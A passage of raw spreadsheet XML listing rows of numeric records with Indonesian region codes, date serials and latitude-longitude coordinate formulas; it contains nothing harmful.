      <c r="T4100" t="s">
        <v>1221</v>
      </c>
      <c r="U4100" s="5">
        <v>11265232801</v>
      </c>
      <c r="V4100" s="5" t="s">
        <v>18161</v>
      </c>
      <c r="W4100" s="5">
        <v>-725349605</v>
      </c>
      <c r="X4100" t="s">
        <v>21894</v>
      </c>
      <c r="Y4100" t="str">
        <f t="shared" si="64"/>
        <v>-7.25349605,112.65232801</v>
      </c>
    </row>
    <row r="4101" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4101">
        <v>298980</v>
      </c>
      <c r="B4101" s="1">
        <v>44508</v>
      </c>
      <c r="C4101" t="s">
        <v>13923</v>
      </c>
      <c r="D4101" t="s">
        <v>22</v>
      </c>
      <c r="E4101" t="s">
        <v>23</v>
      </c>
      <c r="F4101" t="s">
        <v>13924</v>
      </c>
      <c r="G4101" t="s">
        <v>13925</v>
      </c>
      <c r="H4101" t="s">
        <v>26</v>
      </c>
      <c r="I4101" t="s">
        <v>44</v>
      </c>
      <c r="J4101" t="s">
        <v>3135</v>
      </c>
      <c r="L4101" t="s">
        <v>13926</v>
      </c>
      <c r="M4101">
        <v>3603020021</v>
      </c>
      <c r="N4101">
        <v>3603020</v>
      </c>
      <c r="O4101">
        <v>3603</v>
      </c>
      <c r="P4101">
        <v>36</v>
      </c>
      <c r="Q4101" t="s">
        <v>13927</v>
      </c>
      <c r="R4101" t="s">
        <v>13928</v>
      </c>
      <c r="S4101" t="s">
        <v>201</v>
      </c>
      <c r="T4101" t="s">
        <v>171</v>
      </c>
      <c r="U4101" s="5">
        <v>10646672013</v>
      </c>
      <c r="V4101" s="5" t="s">
        <v>18162</v>
      </c>
      <c r="W4101" s="5">
        <v>-621721958</v>
      </c>
      <c r="X4101" t="s">
        <v>21895</v>
      </c>
      <c r="Y4101" t="str">
        <f t="shared" si="64"/>
        <v>-6.21721958,106.46672013</v>
      </c>
    </row>
    <row r="4102" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4102">
        <v>298978</v>
      </c>
      <c r="B4102" s="1">
        <v>44508</v>
      </c>
      <c r="C4102" t="s">
        <v>13929</v>
      </c>
      <c r="D4102" t="s">
        <v>22</v>
      </c>
      <c r="E4102" t="s">
        <v>23</v>
      </c>
      <c r="F4102" t="s">
        <v>13930</v>
      </c>
      <c r="G4102" t="s">
        <v>13931</v>
      </c>
      <c r="H4102" t="s">
        <v>26</v>
      </c>
      <c r="I4102" t="s">
        <v>13932</v>
      </c>
      <c r="J4102" t="s">
        <v>3135</v>
      </c>
      <c r="L4102" t="s">
        <v>13933</v>
      </c>
      <c r="M4102">
        <v>3603020016</v>
      </c>
      <c r="N4102">
        <v>3603020</v>
      </c>
      <c r="O4102">
        <v>3603</v>
      </c>
      <c r="P4102">
        <v>36</v>
      </c>
      <c r="Q4102" t="s">
        <v>13928</v>
      </c>
      <c r="R4102" t="s">
        <v>13928</v>
      </c>
      <c r="S4102" t="s">
        <v>201</v>
      </c>
      <c r="T4102" t="s">
        <v>171</v>
      </c>
      <c r="U4102" s="5">
        <v>10646790340</v>
      </c>
      <c r="V4102" s="5" t="s">
        <v>18163</v>
      </c>
      <c r="W4102" s="5">
        <v>-626333873</v>
      </c>
      <c r="X4102" t="s">
        <v>21896</v>
      </c>
      <c r="Y4102" t="str">
        <f t="shared" si="64"/>
        <v>-6.26333873,106.46790340</v>
      </c>
    </row>
    <row r="4103" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4103">
        <v>298979</v>
      </c>
      <c r="B4103" s="1">
        <v>44508</v>
      </c>
      <c r="C4103" t="s">
        <v>13934</v>
      </c>
      <c r="D4103" t="s">
        <v>22</v>
      </c>
      <c r="E4103" t="s">
        <v>23</v>
      </c>
      <c r="F4103" t="s">
        <v>13935</v>
      </c>
      <c r="G4103" t="s">
        <v>13936</v>
      </c>
      <c r="H4103" t="s">
        <v>26</v>
      </c>
      <c r="I4103" t="s">
        <v>144</v>
      </c>
      <c r="J4103" t="s">
        <v>3135</v>
      </c>
      <c r="L4103" t="s">
        <v>13937</v>
      </c>
      <c r="M4103">
        <v>3603020015</v>
      </c>
      <c r="N4103">
        <v>3603020</v>
      </c>
      <c r="O4103">
        <v>3603</v>
      </c>
      <c r="P4103">
        <v>36</v>
      </c>
      <c r="Q4103" t="s">
        <v>13938</v>
      </c>
      <c r="R4103" t="s">
        <v>13928</v>
      </c>
      <c r="S4103" t="s">
        <v>201</v>
      </c>
      <c r="T4103" t="s">
        <v>171</v>
      </c>
      <c r="U4103" s="5">
        <v>10647755742</v>
      </c>
      <c r="V4103" s="5" t="s">
        <v>18164</v>
      </c>
      <c r="W4103" s="5">
        <v>-624289792</v>
      </c>
      <c r="X4103" t="s">
        <v>21897</v>
      </c>
      <c r="Y4103" t="str">
        <f t="shared" si="64"/>
        <v>-6.24289792,106.47755742</v>
      </c>
    </row>
    <row r="4104" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4104">
        <v>299012</v>
      </c>
      <c r="B4104" s="1">
        <v>44515</v>
      </c>
      <c r="C4104" t="s">
        <v>13939</v>
      </c>
      <c r="D4104" t="s">
        <v>22</v>
      </c>
      <c r="E4104" t="s">
        <v>23</v>
      </c>
      <c r="F4104" t="s">
        <v>13940</v>
      </c>
      <c r="G4104" t="s">
        <v>13941</v>
      </c>
      <c r="H4104" t="s">
        <v>26</v>
      </c>
      <c r="I4104" t="s">
        <v>487</v>
      </c>
      <c r="J4104" t="s">
        <v>3135</v>
      </c>
      <c r="L4104" t="s">
        <v>13942</v>
      </c>
      <c r="M4104">
        <v>3671011005</v>
      </c>
      <c r="N4104">
        <v>3671011</v>
      </c>
      <c r="O4104">
        <v>3671</v>
      </c>
      <c r="P4104">
        <v>36</v>
      </c>
      <c r="Q4104" t="s">
        <v>13943</v>
      </c>
      <c r="R4104" t="s">
        <v>701</v>
      </c>
      <c r="S4104" t="s">
        <v>201</v>
      </c>
      <c r="T4104" t="s">
        <v>171</v>
      </c>
      <c r="U4104" s="5">
        <v>10673772243</v>
      </c>
      <c r="V4104" s="5" t="s">
        <v>18165</v>
      </c>
      <c r="W4104" s="5">
        <v>-623966517</v>
      </c>
      <c r="X4104" t="s">
        <v>21898</v>
      </c>
      <c r="Y4104" t="str">
        <f t="shared" si="64"/>
        <v>-6.23966517,106.73772243</v>
      </c>
    </row>
    <row r="4105" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4105">
        <v>298977</v>
      </c>
      <c r="B4105" s="1">
        <v>44508</v>
      </c>
      <c r="C4105" t="s">
        <v>13944</v>
      </c>
      <c r="D4105" t="s">
        <v>22</v>
      </c>
      <c r="E4105" t="s">
        <v>23</v>
      </c>
      <c r="F4105" t="s">
        <v>13945</v>
      </c>
      <c r="G4105" t="s">
        <v>13946</v>
      </c>
      <c r="H4105" t="s">
        <v>26</v>
      </c>
      <c r="I4105" t="s">
        <v>2562</v>
      </c>
      <c r="J4105" t="s">
        <v>3135</v>
      </c>
      <c r="L4105" t="s">
        <v>13947</v>
      </c>
      <c r="M4105">
        <v>3603020020</v>
      </c>
      <c r="N4105">
        <v>3603020</v>
      </c>
      <c r="O4105">
        <v>3603</v>
      </c>
      <c r="P4105">
        <v>36</v>
      </c>
      <c r="Q4105" t="s">
        <v>13948</v>
      </c>
      <c r="R4105" t="s">
        <v>13928</v>
      </c>
      <c r="S4105" t="s">
        <v>201</v>
      </c>
      <c r="T4105" t="s">
        <v>171</v>
      </c>
      <c r="U4105" s="5">
        <v>10646640437</v>
      </c>
      <c r="V4105" s="5" t="s">
        <v>18166</v>
      </c>
      <c r="W4105" s="5">
        <v>-624966458</v>
      </c>
      <c r="X4105" t="s">
        <v>21899</v>
      </c>
      <c r="Y4105" t="str">
        <f t="shared" si="64"/>
        <v>-6.24966458,106.46640437</v>
      </c>
    </row>
    <row r="4106" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4106">
        <v>298971</v>
      </c>
      <c r="B4106" s="1">
        <v>44507</v>
      </c>
      <c r="C4106" t="s">
        <v>13949</v>
      </c>
      <c r="D4106" t="s">
        <v>22</v>
      </c>
      <c r="E4106" t="s">
        <v>23</v>
      </c>
      <c r="F4106" t="s">
        <v>13950</v>
      </c>
      <c r="H4106" t="s">
        <v>26</v>
      </c>
      <c r="I4106" t="s">
        <v>1651</v>
      </c>
      <c r="J4106" t="s">
        <v>3135</v>
      </c>
      <c r="L4106" t="s">
        <v>13951</v>
      </c>
      <c r="M4106">
        <v>3674060010</v>
      </c>
      <c r="N4106">
        <v>3674060</v>
      </c>
      <c r="O4106">
        <v>3674</v>
      </c>
      <c r="P4106">
        <v>36</v>
      </c>
      <c r="Q4106" t="s">
        <v>13952</v>
      </c>
      <c r="R4106" t="s">
        <v>169</v>
      </c>
      <c r="S4106" t="s">
        <v>170</v>
      </c>
      <c r="T4106" t="s">
        <v>171</v>
      </c>
      <c r="U4106" s="5">
        <v>10673624586</v>
      </c>
      <c r="V4106" s="5" t="s">
        <v>18167</v>
      </c>
      <c r="W4106" s="5">
        <v>-627573899</v>
      </c>
      <c r="X4106" t="s">
        <v>21900</v>
      </c>
      <c r="Y4106" t="str">
        <f t="shared" si="64"/>
        <v>-6.27573899,106.73624586</v>
      </c>
    </row>
    <row r="4107" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4107">
        <v>298953</v>
      </c>
      <c r="B4107" s="1">
        <v>44507</v>
      </c>
      <c r="C4107" t="s">
        <v>13953</v>
      </c>
      <c r="D4107" t="s">
        <v>22</v>
      </c>
      <c r="E4107" t="s">
        <v>23</v>
      </c>
      <c r="F4107" t="s">
        <v>13954</v>
      </c>
      <c r="G4107" t="s">
        <v>13955</v>
      </c>
      <c r="H4107" t="s">
        <v>26</v>
      </c>
      <c r="I4107" t="s">
        <v>1710</v>
      </c>
      <c r="J4107" t="s">
        <v>3135</v>
      </c>
      <c r="L4107" t="s">
        <v>13956</v>
      </c>
      <c r="M4107">
        <v>3674050006</v>
      </c>
      <c r="N4107">
        <v>3674050</v>
      </c>
      <c r="O4107">
        <v>3674</v>
      </c>
      <c r="P4107">
        <v>36</v>
      </c>
      <c r="Q4107" t="s">
        <v>1042</v>
      </c>
      <c r="R4107" t="s">
        <v>1043</v>
      </c>
      <c r="S4107" t="s">
        <v>170</v>
      </c>
      <c r="T4107" t="s">
        <v>171</v>
      </c>
      <c r="U4107" s="5">
        <v>10672952771</v>
      </c>
      <c r="V4107" s="5" t="s">
        <v>18168</v>
      </c>
      <c r="W4107" s="5">
        <v>-627094619</v>
      </c>
      <c r="X4107" t="s">
        <v>21901</v>
      </c>
      <c r="Y4107" t="str">
        <f t="shared" si="64"/>
        <v>-6.27094619,106.72952771</v>
      </c>
    </row>
    <row r="4108" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4108">
        <v>298962</v>
      </c>
      <c r="B4108" s="1">
        <v>44507</v>
      </c>
      <c r="C4108" t="s">
        <v>13957</v>
      </c>
      <c r="D4108" t="s">
        <v>22</v>
      </c>
      <c r="E4108" t="s">
        <v>23</v>
      </c>
      <c r="F4108" t="s">
        <v>13958</v>
      </c>
      <c r="G4108" t="s">
        <v>13959</v>
      </c>
      <c r="H4108" t="s">
        <v>26</v>
      </c>
      <c r="I4108" t="s">
        <v>628</v>
      </c>
      <c r="J4108" t="s">
        <v>3135</v>
      </c>
      <c r="M4108">
        <v>3674060008</v>
      </c>
      <c r="N4108">
        <v>3674060</v>
      </c>
      <c r="O4108">
        <v>3674</v>
      </c>
      <c r="P4108">
        <v>36</v>
      </c>
      <c r="Q4108" t="s">
        <v>168</v>
      </c>
      <c r="R4108" t="s">
        <v>169</v>
      </c>
      <c r="S4108" t="s">
        <v>170</v>
      </c>
      <c r="T4108" t="s">
        <v>171</v>
      </c>
      <c r="U4108" s="5">
        <v>10672340155</v>
      </c>
      <c r="V4108" s="5" t="s">
        <v>18169</v>
      </c>
      <c r="W4108" s="5">
        <v>-625924695</v>
      </c>
      <c r="X4108" t="s">
        <v>21902</v>
      </c>
      <c r="Y4108" t="str">
        <f t="shared" si="64"/>
        <v>-6.25924695,106.72340155</v>
      </c>
    </row>
    <row r="4109" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4109">
        <v>298919</v>
      </c>
      <c r="B4109" s="1">
        <v>44502</v>
      </c>
      <c r="C4109" t="s">
        <v>13960</v>
      </c>
      <c r="D4109" t="s">
        <v>22</v>
      </c>
      <c r="E4109" t="s">
        <v>23</v>
      </c>
      <c r="F4109" t="s">
        <v>13961</v>
      </c>
      <c r="G4109" t="s">
        <v>13962</v>
      </c>
      <c r="H4109" t="s">
        <v>7978</v>
      </c>
      <c r="I4109" t="s">
        <v>7979</v>
      </c>
      <c r="J4109" t="s">
        <v>2608</v>
      </c>
      <c r="L4109" t="s">
        <v>13963</v>
      </c>
      <c r="M4109">
        <v>3323100013</v>
      </c>
      <c r="N4109">
        <v>3323100</v>
      </c>
      <c r="O4109">
        <v>3323</v>
      </c>
      <c r="P4109">
        <v>33</v>
      </c>
      <c r="Q4109" t="s">
        <v>13964</v>
      </c>
      <c r="R4109" t="s">
        <v>8363</v>
      </c>
      <c r="S4109" t="s">
        <v>2612</v>
      </c>
      <c r="T4109" t="s">
        <v>1134</v>
      </c>
      <c r="U4109" s="5">
        <v>11006149650</v>
      </c>
      <c r="V4109" s="5" t="s">
        <v>18170</v>
      </c>
      <c r="W4109" s="5">
        <v>-723599334</v>
      </c>
      <c r="X4109" t="s">
        <v>21903</v>
      </c>
      <c r="Y4109" t="str">
        <f t="shared" si="64"/>
        <v>-7.23599334,110.06149650</v>
      </c>
    </row>
    <row r="4110" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4110">
        <v>299064</v>
      </c>
      <c r="B4110" s="1">
        <v>44524</v>
      </c>
      <c r="C4110" t="s">
        <v>13965</v>
      </c>
      <c r="D4110" t="s">
        <v>22</v>
      </c>
      <c r="E4110" t="s">
        <v>23</v>
      </c>
      <c r="F4110" t="s">
        <v>13966</v>
      </c>
      <c r="G4110" t="s">
        <v>13967</v>
      </c>
      <c r="H4110" t="s">
        <v>7978</v>
      </c>
      <c r="I4110" t="s">
        <v>7979</v>
      </c>
      <c r="J4110" t="s">
        <v>2608</v>
      </c>
      <c r="L4110" t="s">
        <v>13968</v>
      </c>
      <c r="M4110">
        <v>3323110003</v>
      </c>
      <c r="N4110">
        <v>3323110</v>
      </c>
      <c r="O4110">
        <v>3323</v>
      </c>
      <c r="P4110">
        <v>33</v>
      </c>
      <c r="Q4110" t="s">
        <v>13969</v>
      </c>
      <c r="R4110" t="s">
        <v>13970</v>
      </c>
      <c r="S4110" t="s">
        <v>2612</v>
      </c>
      <c r="T4110" t="s">
        <v>1134</v>
      </c>
      <c r="U4110" s="5">
        <v>11011133194</v>
      </c>
      <c r="V4110" s="5" t="s">
        <v>18171</v>
      </c>
      <c r="W4110" s="5">
        <v>-722795218</v>
      </c>
      <c r="X4110" t="s">
        <v>21904</v>
      </c>
      <c r="Y4110" t="str">
        <f t="shared" si="64"/>
        <v>-7.22795218,110.11133194</v>
      </c>
    </row>
    <row r="4111" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4111">
        <v>299233</v>
      </c>
      <c r="B4111" s="1">
        <v>44531</v>
      </c>
      <c r="C4111" t="s">
        <v>13971</v>
      </c>
      <c r="D4111" t="s">
        <v>22</v>
      </c>
      <c r="E4111" t="s">
        <v>23</v>
      </c>
      <c r="F4111" t="s">
        <v>13972</v>
      </c>
      <c r="G4111" t="s">
        <v>13973</v>
      </c>
      <c r="H4111" t="s">
        <v>7978</v>
      </c>
      <c r="I4111" t="s">
        <v>7979</v>
      </c>
      <c r="J4111" t="s">
        <v>2608</v>
      </c>
      <c r="L4111" t="s">
        <v>13974</v>
      </c>
      <c r="M4111">
        <v>3323070012</v>
      </c>
      <c r="N4111">
        <v>3323070</v>
      </c>
      <c r="O4111">
        <v>3323</v>
      </c>
      <c r="P4111">
        <v>33</v>
      </c>
      <c r="Q4111" t="s">
        <v>2611</v>
      </c>
      <c r="R4111" t="s">
        <v>2611</v>
      </c>
      <c r="S4111" t="s">
        <v>2612</v>
      </c>
      <c r="T4111" t="s">
        <v>1134</v>
      </c>
      <c r="U4111" s="5">
        <v>1102467030</v>
      </c>
      <c r="V4111" s="5" t="s">
        <v>18172</v>
      </c>
      <c r="W4111" s="5">
        <v>-72492229</v>
      </c>
      <c r="X4111" t="s">
        <v>21905</v>
      </c>
      <c r="Y4111" t="str">
        <f t="shared" si="64"/>
        <v>-7.2492229,110.2467030</v>
      </c>
    </row>
    <row r="4112" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4112">
        <v>299234</v>
      </c>
      <c r="B4112" s="1">
        <v>44532</v>
      </c>
      <c r="C4112" t="s">
        <v>13975</v>
      </c>
      <c r="D4112" t="s">
        <v>22</v>
      </c>
      <c r="E4112" t="s">
        <v>23</v>
      </c>
      <c r="F4112" t="s">
        <v>13976</v>
      </c>
      <c r="G4112" t="s">
        <v>13977</v>
      </c>
      <c r="H4112" t="s">
        <v>26</v>
      </c>
      <c r="I4112" t="s">
        <v>523</v>
      </c>
      <c r="J4112" t="s">
        <v>7637</v>
      </c>
      <c r="L4112" t="s">
        <v>13978</v>
      </c>
      <c r="M4112">
        <v>6202111006</v>
      </c>
      <c r="N4112">
        <v>6202111</v>
      </c>
      <c r="O4112">
        <v>6202</v>
      </c>
      <c r="P4112">
        <v>62</v>
      </c>
      <c r="Q4112" t="s">
        <v>13979</v>
      </c>
      <c r="R4112" t="s">
        <v>13980</v>
      </c>
      <c r="S4112" t="s">
        <v>7770</v>
      </c>
      <c r="T4112" t="s">
        <v>7642</v>
      </c>
      <c r="U4112" s="5">
        <v>1126535296</v>
      </c>
      <c r="V4112" s="5" t="s">
        <v>18173</v>
      </c>
      <c r="W4112" s="5">
        <v>-24927878</v>
      </c>
      <c r="X4112" t="s">
        <v>21906</v>
      </c>
      <c r="Y4112" t="str">
        <f t="shared" si="64"/>
        <v>-2.4927878,112.6535296</v>
      </c>
    </row>
    <row r="4113" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4113">
        <v>299235</v>
      </c>
      <c r="B4113" s="1">
        <v>44532</v>
      </c>
      <c r="C4113" t="s">
        <v>13981</v>
      </c>
      <c r="D4113" t="s">
        <v>22</v>
      </c>
      <c r="E4113" t="s">
        <v>23</v>
      </c>
      <c r="F4113" t="s">
        <v>13982</v>
      </c>
      <c r="G4113" t="s">
        <v>13983</v>
      </c>
      <c r="H4113" t="s">
        <v>26</v>
      </c>
      <c r="I4113" t="s">
        <v>1005</v>
      </c>
      <c r="J4113" t="s">
        <v>6509</v>
      </c>
      <c r="L4113" t="s">
        <v>13984</v>
      </c>
      <c r="M4113">
        <v>6311010026</v>
      </c>
      <c r="N4113">
        <v>6311010</v>
      </c>
      <c r="O4113">
        <v>6311</v>
      </c>
      <c r="P4113">
        <v>63</v>
      </c>
      <c r="Q4113" t="s">
        <v>13985</v>
      </c>
      <c r="R4113" t="s">
        <v>13986</v>
      </c>
      <c r="S4113" t="s">
        <v>8934</v>
      </c>
      <c r="T4113" t="s">
        <v>6513</v>
      </c>
      <c r="U4113" s="5">
        <v>1154275024</v>
      </c>
      <c r="V4113" s="5" t="s">
        <v>18174</v>
      </c>
      <c r="W4113" s="5">
        <v>-23296527</v>
      </c>
      <c r="X4113" t="s">
        <v>21907</v>
      </c>
      <c r="Y4113" t="str">
        <f t="shared" si="64"/>
        <v>-2.3296527,115.4275024</v>
      </c>
    </row>
    <row r="4114" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4114">
        <v>299349</v>
      </c>
      <c r="B4114" s="1">
        <v>44532</v>
      </c>
      <c r="C4114" t="s">
        <v>13987</v>
      </c>
      <c r="D4114" t="s">
        <v>22</v>
      </c>
      <c r="E4114" t="s">
        <v>23</v>
      </c>
      <c r="F4114" t="s">
        <v>13988</v>
      </c>
      <c r="G4114" t="s">
        <v>13989</v>
      </c>
      <c r="H4114" t="s">
        <v>26</v>
      </c>
      <c r="I4114" t="s">
        <v>1758</v>
      </c>
      <c r="J4114" t="s">
        <v>2627</v>
      </c>
      <c r="L4114" t="s">
        <v>13990</v>
      </c>
      <c r="M4114">
        <v>3204290005</v>
      </c>
      <c r="N4114">
        <v>3204290</v>
      </c>
      <c r="O4114">
        <v>3204</v>
      </c>
      <c r="P4114">
        <v>32</v>
      </c>
      <c r="Q4114" t="s">
        <v>9417</v>
      </c>
      <c r="R4114" t="s">
        <v>2170</v>
      </c>
      <c r="S4114" t="s">
        <v>1464</v>
      </c>
      <c r="T4114" t="s">
        <v>42</v>
      </c>
      <c r="U4114" s="5">
        <v>1077481207</v>
      </c>
      <c r="V4114" s="5" t="s">
        <v>18175</v>
      </c>
      <c r="W4114" s="5">
        <v>-69615830</v>
      </c>
      <c r="X4114" t="s">
        <v>21908</v>
      </c>
      <c r="Y4114" t="str">
        <f t="shared" si="64"/>
        <v>-6.9615830,107.7481207</v>
      </c>
    </row>
    <row r="4115" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4115">
        <v>299359</v>
      </c>
      <c r="B4115" s="1">
        <v>44532</v>
      </c>
      <c r="C4115" t="s">
        <v>13991</v>
      </c>
      <c r="D4115" t="s">
        <v>22</v>
      </c>
      <c r="E4115" t="s">
        <v>23</v>
      </c>
      <c r="F4115" t="s">
        <v>13992</v>
      </c>
      <c r="G4115" t="s">
        <v>13993</v>
      </c>
      <c r="H4115" t="s">
        <v>7978</v>
      </c>
      <c r="I4115" t="s">
        <v>8459</v>
      </c>
      <c r="J4115" t="s">
        <v>2608</v>
      </c>
      <c r="L4115" t="s">
        <v>13994</v>
      </c>
      <c r="M4115">
        <v>3323010039</v>
      </c>
      <c r="N4115">
        <v>3323010</v>
      </c>
      <c r="O4115">
        <v>3323</v>
      </c>
      <c r="P4115">
        <v>33</v>
      </c>
      <c r="Q4115" t="s">
        <v>13995</v>
      </c>
      <c r="R4115" t="s">
        <v>13996</v>
      </c>
      <c r="S4115" t="s">
        <v>2612</v>
      </c>
      <c r="T4115" t="s">
        <v>1134</v>
      </c>
      <c r="U4115" s="5">
        <v>1101070511</v>
      </c>
      <c r="V4115" s="5" t="s">
        <v>18176</v>
      </c>
      <c r="W4115" s="5">
        <v>-72862539</v>
      </c>
      <c r="X4115" t="s">
        <v>21909</v>
      </c>
      <c r="Y4115" t="str">
        <f t="shared" si="64"/>
        <v>-7.2862539,110.1070511</v>
      </c>
    </row>
    <row r="4116" spans="1:25" x14ac:dyDescent="0.25">
      <c r="L4116" t="s">
        <v>13997</v>
      </c>
      <c r="M4116">
        <v>3323100007</v>
      </c>
      <c r="N4116">
        <v>3323100</v>
      </c>
      <c r="O4116">
        <v>3323</v>
      </c>
      <c r="P4116">
        <v>33</v>
      </c>
      <c r="Q4116" t="s">
        <v>13998</v>
      </c>
      <c r="R4116" t="s">
        <v>8363</v>
      </c>
      <c r="S4116" t="s">
        <v>2612</v>
      </c>
      <c r="T4116" t="s">
        <v>1134</v>
      </c>
      <c r="U4116" s="5">
        <v>1100649190</v>
      </c>
      <c r="V4116" s="5" t="s">
        <v>18177</v>
      </c>
      <c r="W4116" s="5">
        <v>-72429381</v>
      </c>
      <c r="X4116" t="s">
        <v>21910</v>
      </c>
      <c r="Y4116" t="str">
        <f t="shared" si="64"/>
        <v>-7.2429381,110.0649190</v>
      </c>
    </row>
    <row r="4117" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4117">
        <v>299362</v>
      </c>
      <c r="B4117" s="1">
        <v>44532</v>
      </c>
      <c r="C4117" t="s">
        <v>13999</v>
      </c>
      <c r="D4117" t="s">
        <v>22</v>
      </c>
      <c r="E4117" t="s">
        <v>23</v>
      </c>
      <c r="F4117" t="s">
        <v>14000</v>
      </c>
      <c r="G4117" t="s">
        <v>14001</v>
      </c>
      <c r="H4117" t="s">
        <v>7978</v>
      </c>
      <c r="I4117" t="s">
        <v>7979</v>
      </c>
      <c r="J4117" t="s">
        <v>2608</v>
      </c>
      <c r="L4117" t="s">
        <v>14002</v>
      </c>
      <c r="M4117">
        <v>3323070012</v>
      </c>
      <c r="N4117">
        <v>3323070</v>
      </c>
      <c r="O4117">
        <v>3323</v>
      </c>
      <c r="P4117">
        <v>33</v>
      </c>
      <c r="Q4117" t="s">
        <v>2611</v>
      </c>
      <c r="R4117" t="s">
        <v>2611</v>
      </c>
      <c r="S4117" t="s">
        <v>2612</v>
      </c>
      <c r="T4117" t="s">
        <v>1134</v>
      </c>
      <c r="U4117" s="5">
        <v>1102482319</v>
      </c>
      <c r="V4117" s="5" t="s">
        <v>18178</v>
      </c>
      <c r="W4117" s="5">
        <v>-72450454</v>
      </c>
      <c r="X4117" t="s">
        <v>21911</v>
      </c>
      <c r="Y4117" t="str">
        <f t="shared" si="64"/>
        <v>-7.2450454,110.2482319</v>
      </c>
    </row>
    <row r="4118" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4118">
        <v>299367</v>
      </c>
      <c r="B4118" s="1">
        <v>44533</v>
      </c>
      <c r="C4118" t="s">
        <v>14003</v>
      </c>
      <c r="D4118" t="s">
        <v>22</v>
      </c>
      <c r="E4118" t="s">
        <v>23</v>
      </c>
      <c r="F4118" t="s">
        <v>14004</v>
      </c>
      <c r="G4118" t="s">
        <v>14005</v>
      </c>
      <c r="H4118" t="s">
        <v>26</v>
      </c>
      <c r="I4118" t="s">
        <v>592</v>
      </c>
      <c r="J4118" t="s">
        <v>7399</v>
      </c>
      <c r="L4118" t="s">
        <v>14006</v>
      </c>
      <c r="M4118">
        <v>1403061002</v>
      </c>
      <c r="N4118">
        <v>1403061</v>
      </c>
      <c r="O4118">
        <v>1403</v>
      </c>
      <c r="P4118">
        <v>14</v>
      </c>
      <c r="Q4118" t="s">
        <v>14007</v>
      </c>
      <c r="R4118" t="s">
        <v>14007</v>
      </c>
      <c r="S4118" t="s">
        <v>14008</v>
      </c>
      <c r="T4118" t="s">
        <v>7404</v>
      </c>
      <c r="U4118" s="5">
        <v>1031485400</v>
      </c>
      <c r="V4118" s="5" t="s">
        <v>18179</v>
      </c>
      <c r="W4118" s="5">
        <v>-3244463</v>
      </c>
      <c r="X4118" t="s">
        <v>21912</v>
      </c>
      <c r="Y4118" t="str">
        <f t="shared" si="64"/>
        <v xml:space="preserve"> -0.3244463,103.1485400</v>
      </c>
    </row>
    <row r="4119" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4119">
        <v>299382</v>
      </c>
      <c r="B4119" s="1">
        <v>44534</v>
      </c>
      <c r="C4119" t="s">
        <v>14009</v>
      </c>
      <c r="D4119" t="s">
        <v>22</v>
      </c>
      <c r="E4119" t="s">
        <v>23</v>
      </c>
      <c r="F4119" t="s">
        <v>14010</v>
      </c>
      <c r="G4119" t="s">
        <v>14011</v>
      </c>
      <c r="H4119" t="s">
        <v>26</v>
      </c>
      <c r="I4119" t="s">
        <v>14012</v>
      </c>
      <c r="J4119" t="s">
        <v>7171</v>
      </c>
      <c r="L4119" t="s">
        <v>14013</v>
      </c>
      <c r="M4119">
        <v>6404041006</v>
      </c>
      <c r="N4119">
        <v>6404041</v>
      </c>
      <c r="O4119">
        <v>6404</v>
      </c>
      <c r="P4119">
        <v>64</v>
      </c>
      <c r="Q4119" t="s">
        <v>14014</v>
      </c>
      <c r="R4119" t="s">
        <v>14015</v>
      </c>
      <c r="S4119" t="s">
        <v>9302</v>
      </c>
      <c r="T4119" t="s">
        <v>1308</v>
      </c>
      <c r="U4119" s="5">
        <v>1177031153</v>
      </c>
      <c r="V4119" s="5" t="s">
        <v>18180</v>
      </c>
      <c r="W4119" s="5">
        <v>6288796</v>
      </c>
      <c r="X4119" t="s">
        <v>21913</v>
      </c>
      <c r="Y4119" t="str">
        <f t="shared" si="64"/>
        <v>0.6288796,117.7031153</v>
      </c>
    </row>
    <row r="4120" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4120">
        <v>299383</v>
      </c>
      <c r="B4120" s="1">
        <v>44534</v>
      </c>
      <c r="C4120" t="s">
        <v>14016</v>
      </c>
      <c r="D4120" t="s">
        <v>22</v>
      </c>
      <c r="E4120" t="s">
        <v>23</v>
      </c>
      <c r="F4120" t="s">
        <v>14017</v>
      </c>
      <c r="G4120" t="s">
        <v>14018</v>
      </c>
      <c r="H4120" t="s">
        <v>26</v>
      </c>
      <c r="I4120" t="s">
        <v>862</v>
      </c>
      <c r="J4120" t="s">
        <v>14019</v>
      </c>
      <c r="L4120" t="s">
        <v>14020</v>
      </c>
      <c r="M4120">
        <v>3374120009</v>
      </c>
      <c r="N4120">
        <v>3374120</v>
      </c>
      <c r="O4120">
        <v>3374</v>
      </c>
      <c r="P4120">
        <v>33</v>
      </c>
      <c r="Q4120" t="s">
        <v>14021</v>
      </c>
      <c r="R4120" t="s">
        <v>9647</v>
      </c>
      <c r="S4120" t="s">
        <v>1334</v>
      </c>
      <c r="T4120" t="s">
        <v>1134</v>
      </c>
      <c r="U4120" s="5">
        <v>1104246722</v>
      </c>
      <c r="V4120" s="5" t="s">
        <v>18181</v>
      </c>
      <c r="W4120" s="5">
        <v>-69557358</v>
      </c>
      <c r="X4120" t="s">
        <v>21914</v>
      </c>
      <c r="Y4120" t="str">
        <f t="shared" si="64"/>
        <v>-6.9557358,110.4246722</v>
      </c>
    </row>
    <row r="4121" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4121">
        <v>299384</v>
      </c>
      <c r="B4121" s="1">
        <v>44534</v>
      </c>
      <c r="C4121" t="s">
        <v>14022</v>
      </c>
      <c r="D4121" t="s">
        <v>22</v>
      </c>
      <c r="E4121" t="s">
        <v>23</v>
      </c>
      <c r="F4121" t="s">
        <v>14023</v>
      </c>
      <c r="G4121" t="s">
        <v>14024</v>
